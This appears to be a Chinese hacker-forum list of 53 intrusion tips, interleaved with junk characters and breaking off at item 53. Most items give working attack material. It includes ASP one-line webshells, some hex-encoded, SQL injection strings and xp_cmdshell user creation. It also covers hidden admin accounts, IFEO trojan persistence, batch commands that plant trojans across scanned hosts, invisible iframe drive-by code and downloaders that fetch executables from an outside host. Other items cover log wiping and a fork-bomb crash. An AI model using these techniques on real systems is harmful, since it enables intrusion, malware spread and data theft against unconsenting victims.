Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 W4 F: X/ H% @* R. D; Mcacls C:\windows\system32 /G hqw20:R( b, U. [% j* r4 a+ ~2 ?
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* y& j# A5 W8 r% n$ u( s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
5 W, L! V5 w( h. S7 z3 k/ b) u
* _8 ^$ a7 T) d+ e0 F& Z+ G2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。; r( \6 a' j8 H6 ~8 s
" E/ e& y1 I d3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
8 Z6 p% |' z* x' J( ?, M) S& ^& q
- l/ P7 C/ _+ @' b4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号& _2 k2 G+ v) d( c. Z6 @$ v
" l, v: \1 L& g: p0 C
5、利用INF文件来修改注册表3 X' v" t( j3 c7 ? v; [
[Version]. e& D# d* v5 @6 d# N
Signature="$CHICAGO$", i+ w/ O% |: F7 d, B' F* Y8 k
[Defaultinstall]
2 L1 p, `" }+ y0 oaddREG=Ating
# p, L3 ]" d5 X) ^) ` [- q[Ating]
/ H1 B0 D2 @# l! J+ b- ? ^HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
' Z$ f; c8 U Z* e; w% |2 ?1 f以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:; ]7 t0 n0 R; K
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
! l3 m) M% M; C3 e& f6 O9 U% S其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
' z+ ~, u ~1 P5 B$ w R5 G* OHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU. d3 J" W o8 g0 h
HKEY_CURRENT_CONFIG 简写为 HKCC+ J" W2 x3 h8 A3 K( e4 C$ z
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
: g) Q+ s5 U: X, F" r' U; J* _"1"这里代表是写入或删除注册表键值中的具体数据" X ]2 }+ S6 W6 ^* [
3 a2 Y3 K A/ w4 _
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,, ?5 d% x$ u& ?2 G: \ c
多了一步就是在防火墙里添加个端口,然后导出其键值
) p* @- d( k5 t[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
. l& X$ z2 T; d( g
8 d( D0 H. @( b% t& M# {7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
; H0 y7 ?% u: A* m& H/ D& O在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
2 a3 W5 @" a$ S8 {+ A; \' V+ z2 q
* d9 D! k$ u$ Y0 O) c& e8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。2 }% h9 ^& c6 m
4 i% n8 u; x3 k- Q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
$ J. o* j P" L可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。9 W5 J$ |9 H5 |3 _' }8 o; d: y6 K
$ u+ |: z3 Q7 A7 N# }* H10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”* k, l/ N$ i9 t2 S, b8 G/ l2 m
- B" g- S: i6 k: A" U8 [
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,5 y5 ^$ w& T. R. k \
用法:xsniff –pass –hide –log pass.txt% ~1 H |- O2 ^ u
% _3 w- g6 l+ P5 p! w5 Q" J) i
12、google搜索的艺术6 V3 A2 {% i3 X( i& e/ H8 |* D
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- z4 \% M* H- n6 t或“字符串的语法错误”可以找到很多sql注入漏洞。
1 K5 d7 O H: b$ N5 K; @1 ~: H; ~- |2 b* h0 Z! K- B5 q
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
: b$ [1 d" H5 W! G) F4 T& p: O! _' k- {* y( V
14、cmd中输入 nc –vv –l –p 1987& e; G( t0 j5 o& d6 r4 k
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
/ S: q6 k' J7 }1 l% k" s" A" m8 R# u; R! A% c* N
15、制作T++木马,先写个ating.hta文件,内容为. l9 g1 d4 Y" P0 d- i/ L p
<script language="VBScript">( e' F3 W: v8 p
set wshshell=createobject ("wscript.shell" )
! W) i0 i/ B2 S$ o! Ya=wshshell.run("你马的名称",1)
( o' h, B0 l) O) l `window.close
! m6 m- h# c2 n</script>' h z5 j8 h6 e1 w
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
+ v; a- C3 ?+ y$ G3 z. U/ A0 i$ Z5 y3 {8 o5 T8 }
16、搜索栏里输入5 o$ t( L3 m3 a( l/ n& s9 v
关键字%'and 1=1 and '%'='- l6 B' X r/ e
关键字%'and 1=2 and '%'='5 \" _5 |5 h4 T& t+ a3 J: ^. p
比较不同处 可以作为注入的特征字符) Y5 J) R2 Y; U6 b: z) X1 F U
, D6 I" q# u2 G. Y, u17、挂马代码<html>
% z! U2 U$ q" Y: @. K9 @' H<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 k1 x$ | p8 G</html>
* M9 A* @# T1 l0 Y+ `* U- o, h3 u& ?7 J2 f! G0 E* ~ S& f
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' K; T4 m. U9 S% c/ H4 d
net localgroup administrators还是可以看出Guest是管理员来。6 f$ z. g- l5 w2 y( ]9 K3 @! h
1 s0 E1 @7 e/ y+ J
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- H! ^; P. d5 h! ~: g; y8 H3 l; O; j
用法: 安装: instsrv.exe 服务名称 路径+ \" g# r5 Y2 W: l# D
卸载: instsrv.exe 服务名称 REMOVE( F/ J5 n' A1 u* N0 m: `
- E4 p, h0 ~3 t. u6 q
0 h6 U% P3 y( W21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ @ @% A, ~* Z& X+ ?) H9 i# I不能注入时要第一时间想到%5c暴库。: Z9 i4 q5 R1 L1 R2 P" n9 }
! ~5 |3 K$ t1 q; Z( O+ T4 o+ g22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~8 j R. Q2 m/ p1 f& Z
* S9 S7 i) l5 u) X8 x23、缺少xp_cmdshell时
) a( c2 y- p3 v# j尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 c4 d: `$ s/ R& c) P假如恢复不成功,可以尝试直接加用户(针对开3389的)
* h1 D% H8 T3 f; o4 S) @9 s* J& Ddeclare @o int
! L8 ]. g' N# C7 A( Mexec sp_oacreate 'wscript.shell',@o out4 y1 `5 @2 h* x% G5 w+ Q* D9 }
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
9 D# D# m6 ]% \; Z4 g4 E) w/ r
, g4 V) f1 f# G/ W* X24.批量种植木马.bat/ b' K0 s- x! l. R
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
# b/ H. W0 O. h( d& p, l$ gfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% b" s2 U& f* _8 }. o' m扫描地址.txt里每个主机名一行 用\\开头
& H, N) n9 c1 K$ X" _1 H- j
, Z S; g& N/ a4 z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) H- c. Q$ j& o% K0 ?+ J4 d w* M7 X( o2 l' d. u! C4 q
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
6 b4 C) p4 {8 d7 v% h# S2 F2 [将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 ?1 r" Z1 N X! `2 g' t( U.cer 等后缀的文件夹下都可以运行任何后缀的asp木马0 w$ E9 O( [' i! |- x/ z" b
6 m' Q7 S0 l V
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP& P J6 u/ Q. `7 g- I
然后用#clear logg和#clear line vty *删除日志* T, M- {( | x$ \, o' U
7 H- c5 j" m! ? w2 E2 {; S28、电脑坏了省去重新安装系统的方法. a# X3 `/ W: Q8 X# H
纯dos下执行,
( r$ \# v, |, g8 Wxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config, K8 x8 U! ?% i8 d
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
% }( \7 _; H4 l$ _3 F
6 F' L$ p$ D! W29、解决TCP/IP筛选 在注册表里有三处,分别是:
3 j4 c* |, g- w E5 ?% o U zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip7 y3 d* N5 J( S6 S$ D
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 Y1 n" F. w8 h& O
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 T/ v0 P" z: W- w$ I; E分别用, A( N/ i& U6 ?4 s) c8 t
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 [; i7 t! w+ X7 {$ N% Yregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# n g; h: T, H1 L% k' p" I9 Z, Gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
_) o8 L+ C- n) h" y M* ~命令来导出注册表项
7 V q# Z* H% q然后把三个文件里的EnableSecurityFilters"=dword:00000001,# V( ^1 \1 m. u: q! s+ v2 G
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# g3 R9 u. m4 @ }( D8 Hregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, m$ j5 o" }; l9 o7 _9 c, n; A6 U4 ~3 y5 Q
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! k2 W3 {6 u/ s+ m
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 y. R3 {! ~+ @: f. D
# Y: w4 r/ }4 N8 I% }4 P31、全手工打造开3389工具
. k6 c' y* U0 G打开记事本,编辑内容如下:
2 W9 V& W# b+ w7 `7 jecho [Components] > c:\sql
. M3 s2 I' R7 h8 Techo TSEnable = on >> c:\sql
. G6 u: N0 J6 V, y7 V' Ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q$ T; E1 j/ b; N& e4 C2 d4 P
编辑好后存为BAT文件,上传至肉鸡,执行
, _6 i% B4 [+ x, D _. \. `: @- [; }, H! ^1 `
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马* K- E" m/ e2 R+ ]1 F5 c
+ Y* t3 i# `& D/ f6 E: _6 W4 a33、让服务器重启1 V @; j9 c5 Y. K3 I
写个bat死循环:! T4 {( k: m+ }& G& b6 {, j$ _
@echo off7 e0 {6 H2 t; e" \: o( G* [
:loop1/ R4 M% }) l: T
cls Q) k: v" K6 N3 l% r- O6 G
start cmd.exe
4 l2 X0 t& \, L7 y, b6 |goto loop11 {/ Y% A8 c) v2 n% |
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启2 O9 a0 \* V' V: U( j- n, n: d
6 ?. ^% h' B; P* c2 I0 Q
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
, m! r% N7 Y' L: ^$ u H4 \@echo off. f, @, {+ T! f/ A1 a
date /t >c:/3389.txt! \& A# M/ S( p4 ?0 P
time /t >>c:/3389.txt% D: U; W' K7 {/ x$ i
attrib +s +h c:/3389.bat* V$ \. `4 \ ?# D
attrib +s +h c:/3389.txt& Z3 h) _) l2 Z' }( z
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
4 e4 e4 w1 |: o `并保存为3389.bat
' T' X, r9 x8 }* x0 A: y; h$ d打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号8 @3 M; I; |3 ^ T
, E. d) G- z7 r3 [ p/ G35、有时候提不了权限的话,试试这个命令,在命令行里输入:' Z. W4 I, O4 o+ f ^
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)# }9 ~9 E- g8 r0 b8 g7 @
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。" _6 i: C7 x" A, v5 v9 }, W
+ N% l& @0 Y. H4 Z0 J; z
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
' [1 @/ V+ m$ m {echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 J4 L+ P7 p/ B$ z2 p" }echo 你的FTP账号 >>c:\1.bat //输入账号% v& i1 P$ d K& O. l
echo 你的FTP密码 >>c:\1.bat //输入密码+ Z3 g" v. |0 ]% h6 `
echo bin >>c:\1.bat //登入
4 @ ~0 m0 W* `- o, secho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
) M7 `+ ]& X7 f; u: qecho bye >>c:\1.bat //退出
1 ]- V; k6 G! M2 T然后执行ftp -s:c:\1.bat即可) U, X' U- v# B/ I. ?* f' e
4 Y. C8 D O$ B' R5 r
37、修改注册表开3389两法
1 T+ K, k: @$ s* n, |(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
$ Y7 }. q, W; X7 T( Recho Windows Registry Editor Version 5.00 >>3389.reg" s, e# v7 K5 a% h
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- I8 z/ e$ e: L2 Vecho "Enabled"="0" >>3389.reg8 `3 P& H2 ^* r: T4 p5 Z H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
. L5 a# Y5 v2 L4 TNT\CurrentVersion\Winlogon] >>3389.reg
9 S% p4 P& k/ K9 Q* [1 f5 s9 becho "ShutdownWithoutLogon"="0" >>3389.reg
i+ b. `* b( j4 S- {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ J4 ~+ c7 K( j& i>>3389.reg0 c: Z3 t9 X+ ^$ P; T$ v, W" n1 Z
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 b$ B" x9 f& M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
- g# I# N' _7 S- t7 q3 [, c- X' ^5 ]>>3389.reg
6 n; y4 @) R7 \) fecho "TSEnabled"=dword:00000001 >>3389.reg- \2 K% q) ~" e6 e; ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
0 Z3 t+ Z7 |& _echo "Start"=dword:00000002 >>3389.reg
8 Z7 \! x) L. P+ X: @8 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 y' i, x2 O2 A) V6 b
>>3389.reg! b# R5 e& \. s9 h0 R& G
echo "Start"=dword:00000002 >>3389.reg
& k6 V9 @7 q3 S' @( pecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
& Q/ c/ Y3 }; I- |, \1 e+ v! H3 ^echo "Hotkey"="1" >>3389.reg
6 h/ m# B2 N! ?* Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 j2 d- X9 J5 [5 l
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
" Z8 J/ Z4 \, C9 h7 o5 Iecho "PortNumber"=dword:00000D3D >>3389.reg
1 ] g: ]5 a+ Z' @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' r3 ^# ~5 \. i1 }$ TServer\WinStations\RDP-Tcp] >>3389.reg
- T [; H# O- M0 b) H7 pecho "PortNumber"=dword:00000D3D >>3389.reg
/ i5 y7 V4 J8 z; L$ i3 h把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
0 L! T) k1 H+ w/ P4 P(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)9 B/ w0 s- @6 D" S! x" q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ P. [1 R" a, b6 D+ j(2)winxp和win2003终端开启
, u7 R9 i' B E- m) n6 }( i用以下ECHO代码写一个REG文件:
' U5 }- o& k8 V! Hecho Windows Registry Editor Version 5.00>>3389.reg* \. N8 v8 A, d4 o* m3 b# Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# o/ Q/ r2 \- w' k
Server]>>3389.reg
/ r* p+ R; C6 K$ E/ Decho "fDenyTSConnections"=dword:00000000>>3389.reg
5 |5 n- U6 [# ~* ]$ d' decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- A7 a5 h) E; a' S: @6 M/ m0 `" dServer\Wds\rdpwd\Tds\tcp]>>3389.reg! N g1 V1 n0 [4 s: X) _
echo "PortNumber"=dword:00000d3d>>3389.reg% k6 N b4 d1 h$ f! R* k: n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 O. H( |0 ?3 H K4 m, DServer\WinStations\RDP-Tcp]>>3389.reg Y0 k' O: f$ p+ ^0 P6 s. h
echo "PortNumber"=dword:00000d3d>>3389.reg% p/ L* F$ {- \' y
然后regedit /s 3389.reg del 3389.reg
3 ~9 I4 n6 O' x, ^& ZXP下不论开终端还是改终端端口都不需重启
, K' G) @, q- w- I$ t2 i/ \# U7 ^4 u# @; ?( | n% m) t6 f9 D+ C
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 a! o! Z6 b0 N3 r6 Z) J& {, j
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- n$ H# E5 Z' S( k; x/ Z/ d3 n, P2 Z
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!5 K3 @: f* t3 {7 I
(1)数据库文件名应复杂并要有特殊字符
- C& T( M9 P' e(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
5 O+ j6 s( j6 J& O" r, `将conn.asp文档中的5 ^* \" y$ d6 x4 Q& F: D% _# [+ r
DBPath = Server.MapPath("数据库.mdb")
; X) Y; Q. [. c7 t% F* cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
! [, e% U, x; C& G) l' z) c& Q0 s" ?
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置# W$ D4 c9 Q7 h" m# N: Q
(3)不放在WEB目录里8 R, K3 X5 h, i! h* d9 V% m1 L
: c& u# ]' l1 q* U, x1 H, ~
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
. H' J F& r% X可以写两个bat文件# m1 ^- e$ |+ }( O% w
@echo off
1 n' t& o: ?; K2 `( n@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) Y g6 x, j7 L4 x7 w
@del c:\winnt\system32\query.exe- r5 y1 u0 s( H1 v! d' p
@del %SYSTEMROOT%\system32\dllcache\query.exe2 H, ?4 v- J2 }; k& Q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的* f5 D2 G# F1 {7 r8 K" s) t
4 v( G4 b4 Y6 r
@echo off
3 W" t1 \8 Q' C@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 G, |$ s# G5 g2 v! s
@del c:\winnt\system32\tsadmin.exe
: v8 o2 T3 U- N9 {. l@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex1 _( v; Z0 _4 E5 B) X; w- m
7 i. w5 k$ T. n( g0 q; u, S# |
41、映射对方盘符% y. i+ ^7 M( I
telnet到他的机器上,
: p& P5 w$ o$ C2 |6 _9 vnet share 查看有没有默认共享 如果没有,那么就接着运行) p6 t8 F9 q3 X; I+ S5 x3 Z; g2 d
net share c$=c:
, ~5 C. i: l; M6 C5 nnet share现在有c$+ N7 Q; L) t4 ~3 k! J7 p
在自己的机器上运行
0 X2 |/ r4 S( h7 Q9 x' snet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
/ h8 h6 B: `5 P! P: ?7 |$ g
& Y* N- i# I% C- |1 v: @: `* Y42、一些很有用的老知识% W3 F' D. X: t2 s# e! y' z9 N4 V
type c:\boot.ini ( 查看系统版本 )
4 X+ v4 A8 @; W W4 Cnet start (查看已经启动的服务)3 Y0 S' H! `& G' x8 t6 [4 G! Z
query user ( 查看当前终端连接 )( S- A+ a4 |. d6 g' W$ h
net user ( 查看当前用户 )8 ?1 s4 }$ T( I: D3 h! F0 C
net user 用户 密码/add ( 建立账号 )
, y2 T0 E" s3 L* O1 Rnet localgroup administrators 用户 /add (提升某用户为管理员)0 l8 }+ I& d% k9 O" u
ipconfig -all ( 查看IP什么的 )
; I! c# \* ~* w; fnetstat -an ( 查看当前网络状态 )
& Z+ b, s4 i$ c7 kfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
& _0 y5 [9 d+ y克隆时Administrator对应1F4# z6 ~! f( Y4 w/ K, S
guest对应1F5
. E- u! M/ t) D/ d- t4 V' l9 s- \; G& Stsinternetuser对应3E8
# a$ _ W/ N% k4 a k' q+ [3 s7 w- k U6 [7 J
43、如果对方没开3389,但是装了Remote Administrator Service- V! x# l: y9 c, ?% p# e
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
$ z0 Q0 n9 I0 z- Z/ D解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 A7 |. S/ v1 g3 K先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% C9 U3 H; f# u8 V! q
Q: i" V% |& l4 v7 b1 }$ p44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: C* j, ]: s: q' p) U* q8 g7 C) q本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)3 n' a9 l9 U$ u4 D4 l. @/ q% |/ o. `% H
0 F& s0 N q. |$ [) x! @! B% x, N; |
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
4 O: m+ u& h2 o: O, U# ?9 r7 lecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* i i6 O( O' r+ K0 P^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =! u8 k% i% v3 U; x1 f* ]
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
( P+ @" h; u4 I) V# x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 g) p; z) x. C& e; N(这是完整的一句话,其中没有换行符)
3 V# V4 u# }9 _然后下载:: w+ k& s& V0 j# T4 z& ?4 E. b
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% a N8 p* j5 ^8 d7 p' x7 Q: l1 ?- U* V% U6 ]7 G# V$ z& k
46、一句话木马成功依赖于两个条件:
4 a" T1 k3 R( Q/ k/ t8 S8 S; y" M* H1、服务端没有禁止adodb.Stream或FSO组件
& z w, {5 L D Q7 V c2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: Q ~& g+ Q1 o, m# ^
8 b2 Q* ~/ E' {2 R
47、利用DB_OWNER权限进行手工备份一句话木马的代码:9 g( F ]$ m- d9 ?1 |8 ^4 Y
;alter database utsz set RECOVERY FULL--
4 F E& k: m* d) g;create table cmd (a image)--
8 _: A1 `! P1 X2 U;backup log utsz to disk = 'D:\cmd' with init--5 Y. d0 R" b4 X }. T
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. w& ]" P) z5 r; {
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--) ?2 {0 F8 R+ e; e9 ^ M
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: q& E D8 z# ~, q
/ w7 |7 [ n( u2 q48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! Q F) {9 x, I8 i" ]
% L. o4 G( D4 [8 V+ E* M, Q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options" B; z ]2 Q1 ]0 M3 A
所有会话用 'all'。5 R+ Q4 P) N: X" i2 G
-s sessionid 列出会话的信息。# v- w& @* s* Q- u3 d: E& \
-k sessionid 终止会话。
, P1 J+ z E8 d# k2 z4 p4 F# n0 m3 k-m sessionid 发送消息到会话。5 \5 b4 x) s; B$ S! j" g4 z* K8 L; t
6 O0 B8 _7 t) t4 ?1 H/ aconfig 配置 telnet 服务器参数。 \. e( E, L+ _0 \) M; s
* x& S3 g& R1 K* u( }common_options 为:6 j l Z! L+ u8 B7 _( Y
-u user 指定要使用其凭据的用户 |* H- y# v" v2 R5 X% ~* h3 [
-p password 用户密码4 j* A$ w6 b& k6 ?( x! I
1 R, I3 Y7 R' Kconfig_options 为:
2 f6 O, n n5 e2 cdom = domain 设定用户的默认域" I' ?" m% m8 [
ctrlakeymap = yes|no 设定 ALT 键的映射$ ~( K2 z$ Z' S0 B
timeout = hh:mm:ss 设定空闲会话超时值
/ M2 S+ Q( f4 ]timeoutactive = yes|no 启用空闲会话。/ q8 X0 w2 C1 _& O' E$ ?
maxfail = attempts 设定断开前失败的登录企图数。
' r7 X% b, V0 v+ n& qmaxconn = connections 设定最大连接数。
$ e/ o; w) u* ]4 K9 ?port = number 设定 telnet 端口。 `* Q1 I3 v# g3 L
sec = [+/-]NTLM [+/-]passwd6 N) }: n; {6 P O4 Q; P! E
设定身份验证机构+ o% o* a, n9 A" c) v
fname = file 指定审计文件名。
2 n: N2 M1 l$ g: W: Mfsize = size 指定审计文件的最大尺寸(MB)。
7 N9 M; v5 ]/ Amode = console|stream 指定操作模式。0 C8 e0 }# G* J* i
auditlocation = eventlog|file|both
2 X4 K5 H) ~- e: s( F指定记录地点
4 b( `# T% h8 e* H Daudit = [+/-]user [+/-]fail [+/-]admin( ^; T* ~8 M5 |6 l
+ C: j! y; l8 I- H49、例如:在IE上访问:
3 q6 a4 p4 b- mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% K8 n! r8 n- F ^/ M1 m9 I- w0 Zhack.txt里面的代码是:$ M7 r# S* S6 b/ m/ u; O
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& E! l9 \5 s6 T把这个hack.txt发到你空间就可以了!4 e. Q, e7 F1 ]# _0 C5 N8 [3 \* _
这个可以利用来做网马哦!
( x$ b) H/ i6 D% v a( S( P c- t! l
50、autorun的病毒可以通过手动限制!; B/ h, l* n5 T
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
% {0 K) Y' [% ?9 r) Y, d6 Z2,打开盘符用右键打开!切忌双击盘符~! ? H. n e1 R. j
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& K- T$ K ?- J) b$ y
, q2 u, L) _+ j% n; @& h51、log备份时的一句话木马:
5 P+ ^& b" Q7 V# b- va).<%%25Execute(request("go"))%%25>
, L0 ~8 N1 [0 j0 Vb).<%Execute(request("go"))%>5 N! i+ k) I5 K: }" E: ]
c).%><%execute request("go")%><%9 N( F% V2 L u- Q4 v, \( p
d).<script language=VBScript runat=server>execute request("sb")</Script>9 q) R$ o) J, C2 q2 W& M# N
e).<%25Execute(request("l"))%25>
0 p$ c1 n; c; ?7 z' z zf).<%if request("cmd")<>"" then execute request("pass")%>
9 v( ~' t- y5 q* [) X. R! R; i9 c& {; o4 O* d1 k0 H# M
52、at "12:17" /interactive cmd h% K7 z3 _; t5 o& Q! R
执行后可以用AT命令查看新加的任务
1 ], e3 B w5 p* B( V用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。6 `: d4 H; u- P: u0 b
; z/ _. H8 m/ Z6 w9 e3 x: m) q53、隐藏ASP后门的两种方法
